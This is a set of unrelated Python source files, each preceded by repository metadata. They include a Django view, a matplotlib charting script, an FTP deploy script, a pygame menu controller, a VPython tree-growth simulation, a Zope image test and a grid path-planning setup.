        # Remaining phones paired with their place (2nd, 3rd, ...).
        other_smartphones = [ (idx+2, smartphones[r.index(x)]) for idx, x in enumerate(sorted(r, reverse=True)[1:])]
        # Python 2 print statement (debug output).
        print other_smartphones
        ctx = {'result': result,
               'other_smartphones': other_smartphones}
        return self.response_class(
            request=self.request,
            template='core/result.html',
            context=ctx
        )

    def post(self, request, *args, **kwargs):
        """Persist the submitted pairwise criterion ratings before normal
        FormView POST handling runs."""
        self.comparison_matrix = [[1 for i in range(5)] for j in range(5)]
        import itertools
        # One POST field named '<pk1>_<pk2>' per unordered criterion pair.
        comb = itertools.combinations(Criterion.objects.all(), 2)
        for ids in comb:
            rating = int(request.POST.get('%s_%s' % (ids[0].pk, ids[1].pk)))
            try:
                # Update the existing rating for this pair, if any.
                criterion_r = CriterionRating.objects.get(user=self.request.user,
                                                          first=ids[0],
                                                          second=ids[1])
                criterion_r.rating = rating
                criterion_r.save()
            except ObjectDoesNotExist:
                criterion_r = CriterionRating(user=self.request.user,
                                              first=ids[0],
                                              second=ids[1],
                                              rating=rating)
                criterion_r.save()
        return FormView.post(self, request, *args, **kwargs)

    def get_context_data(self, **kwargs):
        """Expose the six criterion pairs with the user's stored rating
        (or None) so the template can pre-fill the comparison form."""
        ctx = super(CompareView, self).get_context_data(**kwargs)
        # criteria_rates = [0, 0, 0, 0, 0, 0]
        criteria = Criterion.objects.all()
        # All unordered pairs of the four criteria, in a fixed order.
        criteria_rates = [
                          {'c1':criteria[0], 'c2':criteria[1], 'r':None},
                          {'c1':criteria[0], 'c2':criteria[2], 'r':None},
                          {'c1':criteria[0], 'c2':criteria[3], 'r':None},
                          {'c1':criteria[1], 'c2':criteria[2], 'r':None},
                          {'c1':criteria[1], 'c2':criteria[3], 'r':None},
                          {'c1':criteria[2], 'c2':criteria[3], 'r':None}
                          ]
        # update rating from the user's stored CriterionRating rows
        for c in criteria_rates:
            try:
                c['r'] = CriterionRating.objects.get(user=self.request.user, first=c['c1'], second=c['c2']).rating
            except ObjectDoesNotExist:
                c['r'] = None
        ctx.update({'criteria_rates': criteria_rates
                    })
        return ctx

    def dispatch(self, request, *args, **kwargs):
        # Enforce login before any request handling.
        return LoginRequiredMixin.dispatch(self, request, *args, **kwargs)
|
UTF-8
|
Python
| false | false | 2,013 |
5,927,054,913,659 |
0e7255c51cb122abe260a961eb4f44b7ed88beed
|
41b871fbe0d4d11d5692251725c486e2629fdd2a
|
/src/haf/system/__init__.py
|
cf5de9be2ebaacddaae55f94f3230fb126b547e7
|
[] |
no_license
|
chuck211991/power
|
https://github.com/chuck211991/power
|
5565dc788c90c4d987cca3adab5b9c1ee71af7eb
|
0394993eabd535d2c7f7285bed8b14974d08c00c
|
refs/heads/master
| 2021-01-19T19:30:57.022310 | 2013-04-23T16:56:52 | 2013-04-23T16:56:52 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from system.resources import UserResource
from rest_api.apis import raw

# Register the user resource with the raw REST API at import time.
raw.api.register(UserResource())
|
UTF-8
|
Python
| false | false | 2,013 |
5,239,860,113,574 |
f2b1adba9b51a03163e3462422a12d9404772b74
|
2f3d80f5560f29fd1d8e819d7ec9ba3755bd9aa5
|
/evaluation/analysis/generate_current_chart.py
|
510f5d3a2c4dab6ce8523fd6807429c609742207
|
[] |
no_license
|
gomezgoiri/Nist
|
https://github.com/gomezgoiri/Nist
|
3cb65f2bc84035e582c2befc35f06fb8147431b1
|
cdc64623be16d595a20ce7b9f6bc35d0a40d4a3b
|
refs/heads/master
| 2021-01-18T19:45:02.627058 | 2014-07-10T10:40:55 | 2014-07-10T10:40:55 | 21,585,659 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
'''
Copyright (C) 2014 onwards University of Deusto
All rights reserved.
This software is licensed as described in the file COPYING, which
you should have received as part of this distribution.
This software consists of contributions made by many individuals,
listed below:
@author: Aitor Gómez Goiri <[email protected]>
'''
from argparse import ArgumentParser
from parser import parse_mWatt_data
import numpy as np
from itertools import cycle
import matplotlib.pyplot as plt
from chart_utils import ChartImprover
class DiagramGenerator:
    """Plot a current-vs-time trace and save it following the project's
    chart guidelines. Python 2 code (uses iterator .next())."""

    def __init__(self, title, data):
        """*data* is a (times, currents) pair of sequences; *title* is
        currently unused (ChartImprover receives title=None)."""
        # http://colorschemedesigner.com/previous/colorscheme2/index-es.html?tetrad;100;0;225;0.3;-0.8;0.3;0.5;0.1;0.9;0.5;0.75;0.3;-0.8;0.3;0.5;0.1;0.9;0.5;0.75;0.3;-0.8;0.3;0.5;0.1;0.9;0.5;0.75;0.3;-0.8;0.3;0.5;0.1;0.9;0.5;0.75;0
        self.linesColors = ("#E6AC73", "#CFE673", "#507EA1", "#E67373", "#8A458A")
        # self.linesShapes = ('xk-','+k-.','Dk--') # avoiding spaghetti lines
        self.ci = ChartImprover( title = None, # title,
                                 xlabel = 'Time (ms)',
                                 ylabel = {"label": 'Current (A)', "x": -0.02, "y": 1.1}, # Power (W)
                                 legend_from_to = (0.04, 1.0),
                                 line_width = 0.3 )
        self.generate(data)

    def generate(self, data):
        """Draw the trace on a wide figure and apply the chart guidelines."""
        fig = plt.figure( figsize=(30, 6) )
        ax = fig.add_subplot(111)
        colors = cycle(self.linesColors)
        # Python 2 iterator protocol: .next() (next(colors) in Python 3).
        ax.plot(data[0], data[1], 'k-',
                color = colors.next())
        handles, labels = ax.get_legend_handles_labels()
        #ax.legend(handles, labels, loc='best')
        #ax.set_xlim(0)
        #ax.set_ylim(0)
        self.ci.improve_following_guidelines(ax)

    def show(self):
        """Display the figure interactively."""
        plt.show()

    def save(self, filename):
        """Write the figure to *filename* (format inferred from extension)."""
        plt.savefig(filename, bbox_inches='tight')
# Command-line entry point: parse the exported current trace and save a PDF.
if __name__ == '__main__':
    argp = ArgumentParser()
    argp.add_argument('-rs','--results', default="../results", dest='results_path',
                      help='Specify the folder containing the result files to parse.')
    args = argp.parse_args()
    # Trim the trace to the 3.1s-30s window of interest.
    parsed_data = parse_mWatt_data( args.results_path + "/energy/ExportedData_current.csv", from_t=3.1, to_t=30 ) # ExportedData_current, allKeysSize_current
    d = DiagramGenerator("Current needed", parsed_data)
    d.save('/tmp/current_kdfs.pdf') # or .svg
|
UTF-8
|
Python
| false | false | 2,014 |
15,427,522,545,376 |
da8b6c7754117d8a0786fc1af744654908904a29
|
afdb1272a5e3e3b585401c8c91d11bc8c92981ec
|
/node_modules/espresso/deploy/ftp/deploy.py
|
aa3fcaebd5c8b5d9673341f5503469008c40c5cc
|
[
"GPL-2.0-only",
"JSON",
"BSD-3-Clause",
"MIT",
"GPL-1.0-or-later",
"Apache-2.0"
] |
non_permissive
|
rustedgrail/Tacticalle
|
https://github.com/rustedgrail/Tacticalle
|
cb3b4180c9a6b5af69ab0f3681b86d2e8efcf096
|
b603d837702b76ecb8b0e2dad144f0ecfb0f8ace
|
refs/heads/master
| 2020-05-18T12:14:54.354680 | 2014-03-25T20:20:16 | 2014-03-25T20:20:16 | 13,529,626 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#! /usr/bin/env python2
"""Espresso FTP deployment module.
Copyright(c) 2011 Panacoda GmbH. All rights reserved.
This file is licensed under the MIT license.
Example usage:
#! /bin/sh
host=ftp.panacoda.com # required
port=10021 # optional; default is 21
username=foo # required
password=bar # required
targetPath=/foo # required
deleteTargetPath=true # optional; default is false
timeout=10000 # optional; default is 15000
export host port username password targetPath timeout deleteTargetPath
# deploy $PWD/bar as ftp://foo@bar:ftp.panacoda.com:10021/foo
exec python2 deploy.py bar
"""
import ftplib, sys, re, os
from os.path import basename, dirname, isdir, join, normpath
# 0 = quiet mode (progress dots on stderr); overridden from $debugLevel,
# higher values enable ftplib's own debug output.
debugLevel = 0
# Cache of the current remote working directory; False until first cwd().
workingDirectory = False
def cwd(ftp, path):
    """change remote working directory if it has changed

    Caches the remote cwd in the module-global workingDirectory to avoid
    redundant CWD round-trips.
    """
    global workingDirectory
    if (workingDirectory != path):
        step(ftp.cwd(path))
        # Store the server's canonical path, not the requested one.
        workingDirectory = ftp.pwd()
def delete(ftp, path):
    """delete a remote file or directory (recursive)

    First tries DELE; if the server refuses (error_perm), assumes the
    path is a directory, deletes its entries recursively, then RMDs it.
    A second error_perm is treated as "path did not exist" and ignored.
    """
    global workingDirectory
    path = normpath(path)
    # if path isn't a basename then cwd and make path a basename first
    if basename(path) != path:
        cwd(ftp, dirname(path))
        path = basename(path)
    targetPath = join(workingDirectory, path);
    try:
        cwd(ftp, dirname(targetPath))
        step(ftp.delete(basename(targetPath)))
    except ftplib.error_perm:
        # targetPath was no deletable file. maybe it's a directory...
        try:
            cwd(ftp, targetPath)
            for i in ftp.nlst():
                # Skip the '.' and '..' pseudo-entries.
                if not re.match('^\.\.?$', i):
                    delete(ftp, i)
            cwd(ftp, '..')
            step(ftp.rmd(targetPath))
        except ftplib.error_perm:
            # let's presume the target directory or file didn't exist...
            # that's just what we wanted -> yay, nothing to do! ^_^
            pass
def exists(ftp, path):
    """Return True when a remote file or directory exists at *path*.

    Probes with the MLst command, which succeeds for both files and
    directories; a permanent error reply means the path is absent.
    """
    try:
        ftp.sendcmd('MLst ' + normpath(path))
        return True
    except ftplib.error_perm:
        return False
def put(ftp, sourcePath, targetPath):
    """upload a file or directory (recursive)

    Directories are recreated remotely with MKD and each entry is
    uploaded under the corresponding remote path; plain files are sent
    with a binary STOR.
    """
    sourcePath = normpath(sourcePath)
    targetPath = normpath(targetPath)
    # try to upload a file... or a directory
    if (isdir(sourcePath)):
        cwd(ftp, dirname(targetPath))
        step(ftp.mkd(basename(targetPath)))
        for i in os.listdir(sourcePath):
            put(ftp, join(sourcePath, i), join(targetPath, i))
    else:
        cwd(ftp, dirname(targetPath))
        # Close the local file deterministically (it was previously
        # opened inline and leaked until garbage collection).
        with open(sourcePath, 'rb') as source_file:
            step(ftp.storbinary('STOR ' + basename(targetPath), source_file))
def step(x):
    """indicate progress

    Prints one dot to stderr per completed FTP operation when debugLevel
    is 0 (quiet mode); *x* is the ignored result of the FTP call.
    """
    global debugLevel
    if (debugLevel == 0):
        sys.stderr.write('.')
# Script entry point: read configuration from the environment, connect,
# optionally clear the target path, upload all given source directories.
# Exits 0 on success, 23 on any failure.
if __name__ == '__main__':
    try:
        source_directory_names = sys.argv[1:]
        # load mandatory configuration
        try:
            config = os.environ
            host = config['host']
            username = config['username']
            password = config['password']
        except KeyError as key:
            # TODO better error message
            raise Exception('require configuration: ' + str(key))
        # load optional configuration... or use default values
        port = int(config['port'] if 'port' in config else 21)
        timeout = int(config['timeout'] if 'timeout' in config else 15000)
        targetPath = config['targetPath'] if 'targetPath' in config else '/'
        if 'debugLevel' in config:
            debugLevel = int(config['debugLevel'])
        # TODO? print configuration
        ftp = ftplib.FTP()
        ftp.set_debuglevel(debugLevel)
        step(ftp.connect(host, port, timeout))
        step(ftp.login(username, password))
        # Refuse to overwrite an existing target unless explicitly told
        # to delete it first via deleteTargetPath=true.
        if exists(ftp, targetPath):
            if 'deleteTargetPath' in config and config['deleteTargetPath'] == 'true':
                delete(ftp, targetPath)
            else:
                raise Exception('targetPath already exists, use deleteTargetPath to remove it first');
        for sourcePath in source_directory_names:
            put(ftp, sourcePath, targetPath)
        step(ftp.quit())
        if (debugLevel == 0):
            sys.stderr.write('ok\n')
        sys.exit(0)
    except Exception as x:
        sys.stderr.write('\nError: ' + str(x) + '\n')
        sys.exit(23)
|
UTF-8
|
Python
| false | false | 2,014 |
4,956,392,294,830 |
d7344d6a986e7d879d8e7de322aee5f614f653b7
|
411227479079ccf1d9a4d0417f6d7d1361268f2a
|
/game.py
|
7b0830ec17269da7f454500551058eb9d27c02dd
|
[] |
no_license
|
gshopov/Pyruto
|
https://github.com/gshopov/Pyruto
|
197482607e2be18c91b9430b24a723cb6f74cb2b
|
12ca861b821cbabd6861c19840779952e759c1c1
|
refs/heads/master
| 2016-09-05T17:11:48.378397 | 2013-07-06T05:52:17 | 2013-07-06T05:52:17 | 11,158,568 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# try:
import os
import pygame
from settings import (MAIN_MENU, OPTIONS_MENU, CHARACTER_MENU, PLAY_MENU,
EXIT, SCREEN_SIZE)
from main_menu import MainMenu
from character_menu import CharacterMenu
from options_menu import OptionsMenu
from play_menu import PlayMenu
# except ImportError as message:
# raise SystemExit(message)
# Center the pygame window on screen (must be set before set_mode).
os.environ['SDL_VIDEO_CENTERED'] = '1'
class Game:
    """Top-level controller that wires the main, character, options and
    play menus together and routes control between them."""

    def __init__(self):
        """Start pygame, open the display and begin at the main menu."""
        pygame.init()
        self.screen = pygame.display.set_mode(SCREEN_SIZE)
        self.status = MAIN_MENU

    def run_main_menu(self):
        """Run the main menu, creating or re-initialising it as needed.

        Returns EXIT when the user(s) quit, CHARACTER_MENU after the
        Play button, or OPTIONS_MENU after the Options button.
        """
        if hasattr(self, "main_menu"):
            self.main_menu.reinit()
        else:
            self.main_menu = MainMenu()
        return self.main_menu.main(self.screen)

    def run_character_menu(self):
        """Run the character-selection menu, reusing it when possible.

        Returns EXIT on quit, MAIN_MENU when going back, or PLAY_MENU
        once characters are properly selected.
        """
        if hasattr(self, "character_menu"):
            self.character_menu.reinit()
        else:
            self.character_menu = CharacterMenu()
        return self.character_menu.main(self.screen)

    def run_options_menu(self):
        """Run the options menu (created once and then reused).

        Returns EXIT on quit or MAIN_MENU when going back.
        """
        if not hasattr(self, "options_menu"):
            self.options_menu = OptionsMenu()
        return self.options_menu.main(self.screen)

    def run_play_menu(self):
        """Play one round with the currently selected characters.

        A fresh PlayMenu is built for every round. Returns EXIT when the
        display is closed or CHARACTER_MENU when the round ends.
        """
        if hasattr(self, "play_menu"):
            del self.play_menu
        self.play_menu = PlayMenu(self.character_menu.get_characters())
        return self.play_menu.main(self.screen)

    def play(self):
        """Main loop: dispatch to the menu named by self.status until a
        menu returns EXIT, then shut pygame down."""
        while self.status != EXIT:
            if self.status == MAIN_MENU:
                self.status = self.run_main_menu()
            elif self.status == CHARACTER_MENU:
                self.status = self.run_character_menu()
            elif self.status == OPTIONS_MENU:
                self.status = self.run_options_menu()
            elif self.status == PLAY_MENU:
                self.status = self.run_play_menu()
        pygame.quit()
|
UTF-8
|
Python
| false | false | 2,013 |
16,844,861,769,235 |
41a0b5ec1f9c48de48c986ade15a00e3e3cd8677
|
fe6740673af5f093f41d9cfab5c12883aa6ebbb2
|
/plata/product/feincms/admin.py
|
c6c4b831cc78c9c161f931ea30e3e113aeee8ef6
|
[
"BSD-2-Clause"
] |
permissive
|
chrisglass/plata
|
https://github.com/chrisglass/plata
|
7cb0a2697faff7e0482909aedc2c1b4d3fe8fb0d
|
fce185e5a1c528b0e059a875eaa5724292827bc7
|
refs/heads/master
| 2021-01-17T09:41:05.019482 | 2011-01-20T17:11:41 | 2011-01-20T17:11:41 | 1,320,066 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from django.contrib import admin
from django.utils.translation import ugettext_lazy as _
from feincms.admin.item_editor import ItemEditor, FEINCMS_CONTENT_FIELDSET
from plata.product.admin import ProductAdmin, ProductVariationInline,\
ProductPriceInline, ProductImageInline, ProductForm
from plata.product.models import Product
from . import models
class CMSProductForm(ProductForm):
class Meta:
model = models.CMSProduct
class ProductAdmin(ProductAdmin, ItemEditor):
fieldsets = [(None, {
'fields': ('is_active', 'name', 'slug', 'sku', 'is_featured'),
}),
FEINCMS_CONTENT_FIELDSET,
(_('Properties'), {
'fields': ('ordering', 'description', 'producer', 'categories',
'option_groups', 'create_variations'),
}),
]
form = CMSProductForm
inlines = [ProductVariationInline, ProductPriceInline, ProductImageInline]
admin.site.unregister(Product)
admin.site.register(models.CMSProduct, ProductAdmin)
|
UTF-8
|
Python
| false | false | 2,011 |
10,230,612,104,351 |
16855429e6592cb6c5969ab0bbd70eed03954871
|
130b8d4782ccc600cf47728a511d7c25e6af060e
|
/butter/widgets/__init__.py
|
63dc9aeac29881d722060d3720b6e4bc691a383a
|
[] |
no_license
|
chrisdickinson/django-butter
|
https://github.com/chrisdickinson/django-butter
|
36dfe99612fd13950d6a3058c3a205b07d310218
|
e5e1644a35edd86441fd16e59eabbb9679739463
|
refs/heads/master
| 2023-05-31T08:22:49.414290 | 2011-05-24T08:03:20 | 2011-05-24T08:03:20 | 1,792,332 | 11 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from butter.widgets.related_form import RelatedFormWidget
|
UTF-8
|
Python
| false | false | 2,011 |
6,047,313,974,487 |
d6f299f8a1bbc30d33e81f97ed4b7e6b729316c0
|
153ecce57c94724d2fb16712c216fb15adef0bc4
|
/Zope3/tags/ZopeX3-3.0.0b1/src/zope/app/file/ftests/test_image.py
|
fba4a5a37833aa0c427d42d3f45389e9e34cdc5b
|
[
"ZPL-2.1",
"ZPL-2.0",
"ICU",
"LicenseRef-scancode-public-domain"
] |
non_permissive
|
pombredanne/zope
|
https://github.com/pombredanne/zope
|
10572830ba01cbfbad08b4e31451acc9c0653b39
|
c53f5dc4321d5a392ede428ed8d4ecf090aab8d2
|
refs/heads/master
| 2018-03-12T10:53:50.618672 | 2012-11-20T21:47:22 | 2012-11-20T21:47:22 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""File Functional Tests
$Id$
"""
import unittest
import cgi
from cStringIO import StringIO
from transaction import get_transaction
from zope.app.tests.functional import BrowserTestCase
from zope.publisher.browser import FileUpload
from zope.app.file.image import Image
zptlogo = (
'GIF89a\x10\x00\x10\x00\xd5\x00\x00\xff\xff\xff\xff\xff\xfe\xfc\xfd\xfd'
'\xfa\xfb\xfc\xf7\xf9\xfa\xf5\xf8\xf9\xf3\xf6\xf8\xf2\xf5\xf7\xf0\xf4\xf6'
'\xeb\xf1\xf3\xe5\xed\xef\xde\xe8\xeb\xdc\xe6\xea\xd9\xe4\xe8\xd7\xe2\xe6'
'\xd2\xdf\xe3\xd0\xdd\xe3\xcd\xdc\xe1\xcb\xda\xdf\xc9\xd9\xdf\xc8\xd8\xdd'
'\xc6\xd7\xdc\xc4\xd6\xdc\xc3\xd4\xda\xc2\xd3\xd9\xc1\xd3\xd9\xc0\xd2\xd9'
'\xbd\xd1\xd8\xbd\xd0\xd7\xbc\xcf\xd7\xbb\xcf\xd6\xbb\xce\xd5\xb9\xcd\xd4'
'\xb6\xcc\xd4\xb6\xcb\xd3\xb5\xcb\xd2\xb4\xca\xd1\xb2\xc8\xd0\xb1\xc7\xd0'
'\xb0\xc7\xcf\xaf\xc6\xce\xae\xc4\xce\xad\xc4\xcd\xab\xc3\xcc\xa9\xc2\xcb'
'\xa8\xc1\xca\xa6\xc0\xc9\xa4\xbe\xc8\xa2\xbd\xc7\xa0\xbb\xc5\x9e\xba\xc4'
'\x9b\xbf\xcc\x98\xb6\xc1\x8d\xae\xbaFgs\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00,\x00\x00\x00\x00\x10\x00\x10\x00\x00\x06z@\x80pH,\x12k\xc8$\xd2f\x04'
'\xd4\x84\x01\x01\xe1\xf0d\x16\x9f\x80A\x01\x91\xc0ZmL\xb0\xcd\x00V\xd4'
'\xc4a\x87z\xed\xb0-\x1a\xb3\xb8\x95\xbdf8\x1e\x11\xca,MoC$\x15\x18{'
'\x006}m\x13\x16\x1a\x1f\x83\x85}6\x17\x1b $\x83\x00\x86\x19\x1d!%)\x8c'
'\x866#\'+.\x8ca`\x1c`(,/1\x94B5\x19\x1e"&*-024\xacNq\xba\xbb\xb8h\xbeb'
'\x00A\x00;'
)
class TestFile(BrowserTestCase):
def _setupImage(self):
response = self.publish('/+/action.html',
basic='mgr:mgrpw',
form={'type_name': u'zope.app.content.Image',
'id': u'img'})
fs = cgi.FieldStorage()
fs.name = 'field.data'
fs.value = 'test.gif'
fs.filename = 'test.gif'
fs.file = StringIO(zptlogo)
response = self.publish('/img/@@upload.html',
basic='mgr:mgrpw',
form={'field.data': FileUpload(fs),
'field.contentType': u'image/gif',
'UPDATE_SUBMIT': 'Change'})
def testAddImage(self):
# Step 1: add the image
response = self.publish('/+/action.html',
basic='mgr:mgrpw',
form={'type_name': u'zope.app.content.Image',
'id': u'img'})
self.assertEqual(response.getStatus(), 302)
self.assertEqual(response.getHeader('Location'),
'http://localhost/@@contents.html')
# Step 2: check that it it visible in the folder listing
response = self.publish('/')
self.assertEqual(response.getStatus(), 200)
self.assert_(response.getBody().find('img') != -1)
# Step 3: check that its contents are available
response = self.publish('/img')
self.assertEqual(response.getStatus(), 200)
def testImageUpload(self):
self._setupImage()
root = self.getRootFolder()
self.assertEqual(root['img'].contentType, u'image/gif')
self.assertEqual(root['img'].data, zptlogo)
def testImageUploadOnlyChangingContentType(self):
self._setupImage()
response = self.publish('/img/@@upload.html',
basic='mgr:mgrpw',
form={'field.contentType': u'image/gif2',
'UPDATE_SUBMIT': u'Change'})
root = self.getRootFolder()
self.assertEqual(root['img'].contentType, u'image/gif2')
self.assertEqual(root['img'].data, zptlogo)
def test_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestFile))
return suite
if __name__=='__main__':
unittest.main(defaultTest='test_suite')
|
UTF-8
|
Python
| false | false | 2,012 |
9,500,467,693,368 |
cb51dc5cd91dfed2d9a8186d72137ffddbec6cea
|
2646dd6b9a65eb77bd298501d29c8cbb62e42748
|
/vtrees23.py
|
a5def7a6bfc1d698b9068b23ee99b2341fbff603
|
[
"MIT"
] |
permissive
|
asockman/treemechanics
|
https://github.com/asockman/treemechanics
|
7532aeea4a366a15b3bc8b65f06aa69527aae7d9
|
47346ac2842ef91e4a8d0e6c681d1eafdc8cd5da
|
refs/heads/master
| 2021-01-02T22:50:50.511030 | 2014-07-10T02:12:55 | 2014-07-10T02:12:55 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
""" trees v0.2
procedurally generated foliage
(implicitly happy)
agrippa kellum : june 2013
"""
__all__ = ['Branch', 'Trunk']
import sys, random, math, time, visual as v, numpy as np
class Branch(object):
def __init__(self,inc,az,parent,origin):
self.parent = parent
self.size = 1
self.children = []
self.growtick = 0
self.order = parent.order + 1
self.splitchance = parent.splitchance
self.thickness = 1/100
self.thicken = 0.1/100
self.incmod = inc
self.inclination = parent.inclination+self.incmod
self.azmod = az
self.azimuth = parent.azimuth+self.azmod
self.origin = np.array(origin)
self.relativeorigin = (np.sum((self.origin-parent.origin)**2))**0.5
self.end = np.array(origin)
self.terminated = 0
self.age = 0
def delete(self):
while self.children:
self.children[0].delete()
self.parent.children.remove(self)
del self
def get_end(self,size):
x2 = self.origin[0] + (math.cos(self.azimuth) * math.sin(self.inclination) * size)
y2 = self.origin[1] + (math.cos(self.inclination) * size)
z2 = self.origin[2] + (math.sin(self.azimuth) * math.sin(self.inclination) * size)
return np.array([x2,y2,z2])
# @classmethod
def branchoff(self):
azmod = (random.random()*azrange*2)-azrange
incmod = (random.random()*incrange*2)-incrange
while abs(self.inclination+incmod) > maxinc:
incmod = (random.random()*incrange*2)-incrange
self.children.append(self.__class__(incmod, azmod, self, self.end))
def grow(self):
self.growtick += dominance**self.order
if self.growtick >= 1: #if i have received enough nutrients to grow...
self.growtick %= 1
self.age += 1 #TEMPORARY
self.thickness += self.thicken
if self.terminated == 0: #...and i have a meristem...
if random.random() <= self.splitchance:
self.branchoff()
self.size += growth
self.incmod *= branchdrop
if abs(self.inclination) < maxinc:
self.inclination = self.parent.inclination+self.incmod
else:
self.delete()
self.origin = self.parent.get_end(self.relativeorigin)
self.end = self.get_end(self.size)
for b in self.children:
b.grow()
class Trunk(Branch):
''' A Branch who has no parent -- used to start a tree '''
def __init__(self, origin):
self.azimuth = random.random()*math.pi*2
self.inclination = 0
self.order = -1
self.splitchance = splitchance
super().__init__(0, 0, self,origin)
class VBranch(Branch, v.cone):
def __init__(self, *a):
super().__init__(*a)
v.cone.__init__(self, pos=self.origin, axis=(self.end-self.origin), radius=self.thickness, color=treebark)
def delete(self):
self.visible = False
super().delete()
def draw(self):
self.pos = self.origin
self.axis = (self.end-self.origin)
self.radius = (self.thickness)
if self.children:
for b in self.children:
b.draw()
class VTrunk(Trunk, VBranch):
    """Drawable root: Trunk's parentless initialisation combined with
    VBranch's cone rendering via the method resolution order."""
    pass
# --- Display and simulation parameters ------------------------------------
height = 800
width = 1000
# random.seed(232)
green = (0.2,0.8,0)
yello = (0.8,0.8,0)
treebark = (0.6,0.4,0)
incrange = 0.5
azrange = math.pi*2
growth = 0.03
splitchance = 0.005
leafmod = 0.1
maxinc = math.pi/2
branchdrop = 1.0005
dominance = 1 #how much nutrients does a parent give its child?
display = v.display(title="my own tree!",width=width,height=height)
tree = VTrunk((0,0,0))
mousedown = 0
growit = 0
# Main loop: pressing 'e' enables growth; any other key pauses it.
while 1:
    if display.kb.keys:
        key = display.kb.getkey()
        if key == 'e':
            growit = 1
        else:
            growit = 0
    if growit:
        tree.grow()
    # Keep the camera centred on the middle of the trunk.
    display.center = tree.get_end(tree.size/2)
    tree.draw()
|
UTF-8
|
Python
| false | false | 2,014 |
19,078,244,732,909 |
c62ebf89f2cf2f42d0e4b00902557fffa491a38b
|
7775fbd81b6f4cd2790046651e6640cce7904c11
|
/001-Any_Angle_Path_Planning/Program/main.py
|
995803fbde1e69996c64d1b209e8e83ac953b134
|
[] |
no_license
|
SajidQ/AI_CS382_Projects
|
https://github.com/SajidQ/AI_CS382_Projects
|
3011b10db3cdcf4d3fcd9e7909945535bfe4edb6
|
57497421d639774fa5b970fd708473ac90cd9499
|
refs/heads/master
| 2021-01-25T05:27:58.980568 | 2013-01-28T04:34:26 | 2013-01-28T04:34:26 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Authors: Tina Nye & Qandeel Sajid
# Project: AI-Project 1
#! /usr/bin/env python
# Pygame visualization template
import pygame
import math
import min_heap
import sys
import time
import functions
import A_star
import Theta_star
import random
from apgl.graph.SparseGraph import *
from apgl.graph.VertexList import *
import numpy
import scipy.sparse
###### Print Intro
print "\n--------------------------------"
print "Program: Any-Angle Path Planning"
print "By: Tina Nye & Qandeel Sajid"
##############################################################################
#-----CONSTANTS-------------------------------------------------
# Define some colors (RGB tuples used by the pygame renderer below)
black = ( 0, 0, 0)
white = ( 255, 255, 255)
green = ( 0, 255, 0)
blue=(0,0,255)
red = ( 255, 0, 0)
gray=(88, 88, 88)
pink=(255,0,255)
light_blue=(0,255,255)
light_gray=(152,152,152)
percentBlocked=.1 #--10%
# This sets the width and height of each grid location
width=11
height=11
#width=21
#height=21
# This sets the margin between each cell
margin=1
# Set the row and column length (grid dimensions, including the blocked border)
rowLength = 52
colLength = 102
#rowLength = 26
#colLength = 51
# Becomes True when obstacles/start/goal are loaded from a file argument.
file_provided=False
##############################################################################
#check if file is provided
#if so, get obstacles, start/goal from file
if(len(sys.argv)>1):
try:
fin=open(sys.argv[1], "r")
except IOError:
print '\nERROR: Cannot open file, will use random obstacles and start/goal'
else:
obstacles=[]
print sys.argv[1]
file_provided=True
#read every thing from file
fileInfo=[]
fileInfo.append(fin.readline())
while fileInfo[len(fileInfo)-1]:
fileInfo.append(fin.readline())
# Get obstacles from file
for i in range (len(fileInfo)-3):
val= (fileInfo[i].split(' '))
#print str(i) +":"+str(val) + " " + str(val[0])+ " " + str(val[1])
x=int(val[0])
y=int(val[1])
#print str(x)+ " "+str(y)
obstacles.append([x,y]) #get the x, y coordinated
#get start/goal from end of file
val= (fileInfo[len(fileInfo)-3].split(' '))
x=int(val[0])
y=int(val[1])
start=[x,y]
val= fileInfo[len(fileInfo)-2].split(' ')
x=int(val[0])
y=int(val[1])
goal=[x,y]
#-----------------------------------------------------------------
##############################################################################
##############################################################################
##############################################################################
#--- Randomly pick out 10% BLOCKED CELLS if file not provided ---
#This sections first randomly picks random vertices and makes them into obstacles. The if statement ensures that the border does not count as the 10% of blocked vertices
if(file_provided==False):
    obstacles=[]
    # 10% of the interior (non-border) cells get blocked.
    maxBlockCells=int(math.floor((rowLength-2)*(colLength-2)*percentBlocked))
    #print "number of blocked cells: " + str(maxBlockCells)
    # Rejection sampling: retry until we have exactly maxBlockCells distinct
    # interior cells (duplicates and border cells are skipped).
    while(len(obstacles)!=maxBlockCells):
        x=int(math.floor(random.random()*(colLength-1)))
        y=int(math.floor(random.random()*(rowLength-1)))
        #print str(x) +", y="+ str(y)
        if(obstacles.count([x,y])==0 and x!=0 and x!=colLength and y!=0 and y!= rowLength):
            obstacles.append([x,y])
    # this part blocks out the bordering cells
    for i in range(colLength):
        obstacles.append([i,0])
        obstacles.append([i, rowLength-1])
    for i in range(rowLength):
        obstacles.append([0, i])
        obstacles.append([colLength-1,i])
#---- Making the Graph ---------------------------------------------
# This initializes the graph, just basic things (its in the SparseGraph Ex)
numFeatures=0
numVertices=(rowLength-1)*(colLength-1)
vList=GeneralVertexList(numVertices)
weightMatrix = scipy.sparse.lil_matrix((numVertices, numVertices))
graph = SparseGraph(vList,True, W=weightMatrix) # HERE IS YOUR GRAPH!
